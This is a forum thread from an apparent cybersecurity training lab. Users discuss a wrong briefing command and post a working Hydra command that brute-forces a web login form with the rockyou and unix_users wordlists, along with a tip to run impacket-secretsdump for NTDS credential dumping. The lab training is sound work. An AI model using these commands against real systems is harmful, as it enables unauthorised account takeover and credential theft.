Forum Discussion
Credential Access: Using Hydra
- 26 days agoThe lab has now been updated to provide a little more context. Hopefully it helps a bit. 
Briefing needs to be updated. I see why you got stuck here. The briefing says to use...
hydra -l admin -P /path/to/wordlist.txt http-post-form \
"http://example.com/login.php:username=^USER^&password=^PASS^&submit=Login:Invalid password"
when hydra won't accept this. The correct format is:
hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/rockyou.txt -s 8000 10.102.108.182 http-post-form "/login:username=^USER^&password=^PASS^:F=Login failed!"
Wasted too much time troubleshooting the query when the briefing was wrong! Thanks LewisMutton Dark_Knight666 KingMashaba for the write up here! Hope it helps others that are stuck on this question.
- SamDickison31 days agoCommunity Manager Hmm, I'll bring this up with support to see if they can do something about it. Sorry it wasted your time. - KingMashaba30 days agoBronze II Please do check this, the briefing notes need to be updated. Even the section on Credentials - ntds, which is in the same lab as this one. you cannot run secrectsdump.dy as stated in the notes, needs to be run as impacket-secrectsdump. - SamDickison30 days agoCommunity Manager Hey ChaosDuck26 and KingMashaba, I've caught up with the Cyber Team and they said that the briefing is supposed to be an example of a command, and that the idea is for the user to craft their own from the example. It sounds like you worked it out.